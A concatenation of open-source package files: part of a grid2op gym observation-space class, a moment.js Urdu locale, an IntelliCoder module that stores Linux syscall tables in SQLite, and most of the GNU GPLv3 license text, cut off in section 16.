if shape is None:
shape = shape_
else:
shape = (shape[0] + shape_[0],)
# handle low / high
if el in self._subtract:
low_ = 1.0 * low_.astype(dtype)
high_ = 1.0 * high_.astype(dtype)
low_ -= self._subtract[el]
high_ -= self._subtract[el]
if el in self._divide:
low_ = 1.0 * low_.astype(dtype)
high_ = 1.0 * high_.astype(dtype)
low_ /= self._divide[el]
high_ /= self._divide[el]
if low is None:
low = low_
high = high_
else:
low = np.concatenate((low.astype(dtype), low_.astype(dtype))).astype(
dtype
)
high = np.concatenate((high.astype(dtype), high_.astype(dtype))).astype(
dtype
)
# remember where this need to be stored
self._dims.append(shape[0])
return low, high, shape, dtype
def _handle_attribute(self, grid2op_observation, attr_nm):
res = getattr(grid2op_observation, attr_nm).astype(self.dtype)
if attr_nm in self._subtract:
res -= self._subtract[attr_nm]
if attr_nm in self._divide:
res /= self._divide[attr_nm]
return res
def to_gym(self, grid2op_observation):
"""
This is the function that is called to transform a grid2Op observation, sent by the grid2op environment
and convert it to a numpy array (an element of a gym Box)
Parameters
----------
grid2op_observation:
The grid2op observation (as a grid2op object)
Returns
-------
res: :class:`numpy.ndarray`
A numpy array compatible with the openAI gym Box that represents the action space.
"""
res = np.empty(shape=self.shape, dtype=self.dtype)
prev = 0
for attr_nm, where_to_put in zip(self._attr_to_keep, self._dims):
if attr_nm in self.__func:
tmp = self.__func[attr_nm](grid2op_observation)
elif hasattr(grid2op_observation, attr_nm):
tmp = self._handle_attribute(grid2op_observation, attr_nm)
else:
raise RuntimeError(f'Unknown attribute "{attr_nm}".')
res[prev:where_to_put] = tmp
prev = where_to_put
return res
def close(self):
pass
def get_indexes(self, key: str) -> Tuple[int, int]:
"""Allows to retrieve the indexes of the gym action that
are concerned by the attribute name `key` given in input.
.. versionadded:: 1.9.3
.. warning::
Copy paste from box_gym_act_space, need refacto !
Parameters
----------
key : str
the attribute name (*eg* "set_storage" or "redispatch")
Returns
-------
Tuple[int, int]
_description_
Examples
--------
You can use it like:
.. code-block:: python
gym_env = ... # an environment with a BoxActSpace
act = np.zeros(gym_env.action_space.shape)
key = "redispatch" # "redispatch", "curtail", "set_storage"
start_, end_ = gym_env.action_space.get_indexes(key)
act[start_:end_] = np.random.uniform(high=1, low=-1, size=env.gen_redispatchable.sum())
# act only modifies the redispatch with the input given (here a uniform redispatching between -1 and 1)
"""
error_msg =(f"Impossible to use the grid2op action property \"{key}\""
f"with this action space.")
if key not in self._attr_to_keep:
raise Grid2OpException(error_msg)
prev = 0
for attr_nm, where_to_put in zip(
self._attr_to_keep, self._dims
):
if attr_nm == key:
return prev, where_to_put
prev = where_to_put
raise Grid2OpException(error_msg)
def normalize_attr(self, attr_nm: str):
"""
This function normalizes the part of the space
that corresponds to the attribute `attr_nm`.
The normalization consists in having a vector between 0. and 1.
It is achieved by:
- dividing by the range (high - low)
- adding the minimum value (low).
.. note::
It only affects continuous attribute. No error / warnings are
raised if you attempt to use it on a discrete attribute.
.. warning::
This normalization relies on the `high` and `low` attribute. It cannot be done if
the attribute is not bounded (for example when its maximum limit is `np.inf`). A warning
is raised in this case.
Parameters
----------
attr_nm : `str`
The name of the attribute to normalize
"""
if attr_nm in self._divide or attr_nm in self._subtract:
raise Grid2OpException(
f"Cannot normalize attribute \"{attr_nm}\" that you already "
f"modified with either `divide` or `subtract` (observation space)."
)
prev = 0
if self.dtype != dt_float:
raise Grid2OpException(
"Cannot normalize attribute with a observation "
"space that is not float !"
)
for attr_tmp, where_to_put in zip(self._attr_to_keep, self._dims):
if attr_tmp == attr_nm:
curr_high = 1.0 * self.high[prev:where_to_put]
curr_low = 1.0 * self.low[prev:where_to_put]
finite_high = np.isfinite(curr_high)
finite_low = np.isfinite(curr_high)
both_finite = finite_high & finite_low
both_finite &= curr_high > curr_low
if (~both_finite).any():
warnings.warn(f"The normalization of attribute \"{both_finite}\" cannot be performed entirely as "
f"there are some non finite value, or `high == `low` "
f"for some components.")
self._divide[attr_nm] = np.ones(curr_high.shape, dtype=self.dtype)
self._subtract[attr_nm] = np.zeros(curr_high.shape, dtype=self.dtype)
self._divide[attr_nm][both_finite] = (
curr_high[both_finite] - curr_low[both_finite]
)
self._subtract[attr_nm][both_finite] += curr_low[both_finite]
self.high[prev:where_to_put][both_finite] = 1.0
self.low[prev:where_to_put][both_finite] = 0.0
break
prev = where_to_put
if GYM_AVAILABLE:
from gym.spaces import Box as LegGymBox
from grid2op.gym_compat.base_gym_attr_converter import BaseLegacyGymAttrConverter
BoxLegacyGymObsSpace = type("BoxLegacyGymObsSpace",
(__AuxBoxGymObsSpace, LegGymBox, ),
{"_gymnasium": False,
"_BaseGymAttrConverterType": BaseLegacyGymAttrConverter,
"_BoxType": LegGymBox,
"__module__": __name__})
BoxLegacyGymObsSpace.__doc__ = __AuxBoxGymObsSpace.__doc__
BoxGymObsSpace = BoxLegacyGymObsSpace
BoxGymObsSpace.__doc__ = __AuxBoxGymObsSpace.__doc__
if GYMNASIUM_AVAILABLE:
from gymnasium.spaces import Box
from grid2op.gym_compat.base_gym_attr_converter import BaseGymnasiumAttrConverter
BoxGymnasiumObsSpace = type("BoxGymnasiumObsSpace",
(__AuxBoxGymObsSpace, Box, ),
{"_gymnasium": True,
"_BaseGymAttrConverterType": BaseGymnasiumAttrConverter,
"_BoxType": Box,
"__module__": __name__})
BoxGymnasiumObsSpace.__doc__ = __AuxBoxGymObsSpace.__doc__
BoxGymObsSpace = BoxGymnasiumObsSpace
BoxGymObsSpace.__doc__ = __AuxBoxGymObsSpace.__doc__ | PypiClean |
/Flask_AdminLTE3-1.0.9-py3-none-any.whl/flask_adminlte3/static/plugins/moment/locale/ur.js |
;(function (global, factory) {
typeof exports === 'object' && typeof module !== 'undefined'
&& typeof require === 'function' ? factory(require('../moment')) :
typeof define === 'function' && define.amd ? define(['../moment'], factory) :
factory(global.moment)
}(this, (function (moment) { 'use strict';
//! moment.js locale configuration
var months = [
'جنوری',
'فروری',
'مارچ',
'اپریل',
'مئی',
'جون',
'جولائی',
'اگست',
'ستمبر',
'اکتوبر',
'نومبر',
'دسمبر',
],
days = ['اتوار', 'پیر', 'منگل', 'بدھ', 'جمعرات', 'جمعہ', 'ہفتہ'];
var ur = moment.defineLocale('ur', {
months: months,
monthsShort: months,
weekdays: days,
weekdaysShort: days,
weekdaysMin: days,
longDateFormat: {
LT: 'HH:mm',
LTS: 'HH:mm:ss',
L: 'DD/MM/YYYY',
LL: 'D MMMM YYYY',
LLL: 'D MMMM YYYY HH:mm',
LLLL: 'dddd، D MMMM YYYY HH:mm',
},
meridiemParse: /صبح|شام/,
isPM: function (input) {
return 'شام' === input;
},
meridiem: function (hour, minute, isLower) {
if (hour < 12) {
return 'صبح';
}
return 'شام';
},
calendar: {
sameDay: '[آج بوقت] LT',
nextDay: '[کل بوقت] LT',
nextWeek: 'dddd [بوقت] LT',
lastDay: '[گذشتہ روز بوقت] LT',
lastWeek: '[گذشتہ] dddd [بوقت] LT',
sameElse: 'L',
},
relativeTime: {
future: '%s بعد',
past: '%s قبل',
s: 'چند سیکنڈ',
ss: '%d سیکنڈ',
m: 'ایک منٹ',
mm: '%d منٹ',
h: 'ایک گھنٹہ',
hh: '%d گھنٹے',
d: 'ایک دن',
dd: '%d دن',
M: 'ایک ماہ',
MM: '%d ماہ',
y: 'ایک سال',
yy: '%d سال',
},
preparse: function (string) {
return string.replace(/،/g, ',');
},
postformat: function (string) {
return string.replace(/,/g, '،');
},
week: {
dow: 1, // Monday is the first day of the week.
doy: 4, // The week that contains Jan 4th is the first week of the year.
},
});
return ur;
}))); | PypiClean |
/IntelliCoder-0.5.2.tar.gz/IntelliCoder-0.5.2/intellicoder/database.py | from logging import getLogger
import re
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, Integer
from sqlalchemy import create_engine
from sqlalchemy import and_, or_
from sqlalchemy.orm import sessionmaker
from more_itertools import chunked
from .init import _
from .utils import remove_false
logging = getLogger(__name__)
Base = declarative_base()
Session = sessionmaker()
class Database(object):
def __init__(self, filename):
self.filename = filename
self.engine = create_engine('sqlite:///{}'.format(filename))
Base.metadata.create_all(self.engine)
Session.configure(bind=self.engine)
self.session = Session()
def query_item(self, key, abis):
"""Query items based on system call number or name."""
try:
key = int(key)
field = 'number'
except ValueError:
try:
key = int(key, 16)
field = 'number'
except ValueError:
field = 'name'
arg = and_(getattr(Item, field) == key,
or_(Item.abi == abi for abi in abis))
return self.session.query(Item).filter(arg).all()
def query_decl(self, **kwargs):
"""Query declarations."""
return self.session.query(Decl).filter_by(**kwargs).all()
def add_data(self, filenames):
"""Add data."""
def _parse_table(table):
def _parse_line(line):
return line.split('\t')
lines = (_parse_line(one) for one in table.splitlines()
if re.match(r'^\d', one))
return (remove_false(one) for one in lines)
def _parse_decl(decl):
index = len('SYSCALL_DEFINE')
argc = decl[index]
rest = decl[index + 1:][1:-1].split(',')
name = rest[0]
# args = [one.strip() for one in rest[1:]]
args = ','.join(rest[1:])
return name, argc, args
def _parse_line(line):
index = line.find(':')
if index == -1:
raise RuntimeError('This is unexpected: %s', line)
filename = line[:index]
decl = line[index + 1:]
return filename, _parse_decl(decl)
def _split_into_lines(grep_output):
lines = grep_output.replace('\n\n', '\n')
lines = lines.replace('\n\t', '').replace('\t', ' ')
return lines.strip().splitlines()
for one in filenames:
if one.name.endswith('.tbl'):
for item in _parse_table(one.read()):
args = list(item)
if len(args) != 5:
args += [''] * (5 - len(args))
self.session.add(
Item(name=args[2], abi=args[1],
number=args[0], entry=args[3],
compat=args[4]))
else:
for line in _split_into_lines(one.read()):
filename, rest = (_parse_line(line))
self.session.add(
Decl(name=rest[0], filename=filename,
argc=rest[1], args=rest[2]))
self.session.commit()
class Item(Base):
"""Items in *.tbl files."""
__tablename__ = 'items'
item_id = Column(Integer, primary_key=True)
name = Column(String, index=True)
abi = Column(String)
number = Column(Integer)
entry = Column(String)
compat = Column(String)
def __repr__(self):
template = '<Item(item_id={0.item_id}, name={0.name}' \
', abi={0.abi}, number={0.number}' \
', entry={0.entry}, compat={0.compat})>'
return template.format(self)
class Decl(Base):
"""Declarations."""
__tablename__ = 'decls'
decl_id = Column(Integer, primary_key=True)
name = Column(String, index=True)
filename = Column(String)
argc = Column(Integer)
args = Column(String)
def decl(self):
logging.debug(_('args: %s'), self.args)
args = self.args.strip().replace('__user ', '').split(',')
logging.debug(_('args: %s'), args)
args = [''.join(pair) for pair in chunked(args, 2)]
return 'long {}({});'.format(
self.name.strip(), ', '.join(args))
def __repr__(self):
template = '<Decl(name={0.name}, filename={0.filename}' \
', argc={0.argc}, args={0.args})>'
return template.format(self) | PypiClean |
/IHEWAcollect-0.0.31.tar.gz/IHEWAcollect-0.0.31/LICENSE.rst | GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Use with the GNU Affero General Public License.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
